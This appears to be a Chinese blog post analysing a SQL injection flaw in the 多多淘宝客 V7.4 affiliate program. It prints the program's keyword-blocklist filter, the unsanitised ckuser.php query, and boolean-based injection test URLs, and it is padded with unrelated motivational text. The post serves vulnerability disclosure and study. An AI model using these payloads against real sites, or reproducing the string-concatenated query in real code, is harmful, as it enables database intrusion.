多多淘宝客V7.4绕过防注入及一个注入漏洞的分析

我们都在一点点的伤害中学会坚强。所以不要埋怨那些伤害你总是在你背后捅你刀子的人。要不是他们。你怎会知道江湖险恶。
由于程序是开源程序
并下载其程序看了一番。其实程序员还是有一点安全意识的:
防注入代码:

复制代码
代码如下:

//要过滤的非法字符
$ArrFiltrate = array (
"#union#i",
"#<script#i",
"#/script>#i",
"#select#i",
"#alert#i",
"#javascript#i",
"#<table#i",
"#<td#i",
"#\"#i",
"#\'#i",
"#delete#i",
"#vbscript#i",
"#applet#i",
"#frame#i",
"#<div#i",
"#update#i",
"#'#i",
"#union #i",
"#select #i",
"#delete #i",
"#update #i",
"#and #i",
"#;#i",
"#update#i"
);
$replacements='';
function FunStringExist(&$array,$ArrFiltrate,$replacements)
{
if (is_array($array))
{
foreach ($array as $key => $value)
{
if (is_array($value))
FunStringExist($array[$key],$ArrFiltrate,$replacements);
else
$array[$key] = preg_replace($ArrFiltrate, $replacements, $value);
}
}
}
FunStringExist($_GET,$ArrFiltrate,$replacements);
FunStringExist($_POST,$ArrFiltrate,$replacements);

这段代码多少还是有瑕疵的、只过滤www.haodaima.com get post 我们只要找调用request的地方
别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响

复制代码
代码如下:

header("Content-Type:text/html;charset=utf-8");
include "../comm/config.php";
$uname = trim($_GET["name"]);
if($uname==''){
echo "true";
}else{
$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB);
mysql_select_db("$dbname",$con)or die("can not choose the dbname!");
$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'";
mysql_query("set names utf8");
$res=mysql_query($query);
if(mysql_num_rows($res)!=0)
{echo "true";}
else
{echo "false";}
}

首先注册一个用户.让程序能过判断
ckuser.php?name=maxadd' and 1=1 and ''='
返回true
ckuser.php?name=maxadd' and 1=2 and ''='
返回false

到此这篇关于多多淘宝客V7.4绕过防注入及一个注入漏洞的分析就介绍到这了。害怕失败的人将一事无成。过去所有名人都经受了一个又一个的失败。但是,他们在失败的时候不是沮丧气馁,而是不屈的拼搏,最后取得了胜利。青春时代的真正失败,毋宁说是逃避艰苦的斗争,没有目标,懦弱潦倒。艰苦奋斗后的失败,是人生的宝贵财富。期望你们不好害怕失败,勇敢地度过青春。更多相关多多淘宝客V7.4绕过防注入及一个注入漏洞的分析内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!